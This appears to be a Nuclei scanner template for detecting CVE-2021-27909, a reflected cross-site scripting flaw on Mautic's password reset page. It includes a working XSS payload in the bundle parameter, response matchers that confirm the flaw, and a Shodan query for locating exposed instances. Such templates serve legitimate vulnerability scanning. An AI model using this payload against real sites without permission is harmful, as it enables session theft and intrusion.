48 lines
1.3 KiB
YAML
48 lines
1.3 KiB
YAML
id: CVE-2021-27909
|
|
|
|
info:
|
|
name: Mautic <3.3.4 - Cross-Site Scripting
|
|
author: kiransau
|
|
severity: medium
|
|
description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.
|
|
reference:
|
|
- https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27909
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-27909
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:*
|
|
epss-score: 0.00094
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: title:"Mautic"
|
|
verified: "true"
|
|
tags: cve,cve2021,mautic,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "'';alert(document.domain);var ok='"
|
|
- 'mauticBasePath'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by md on 2022/10/17
|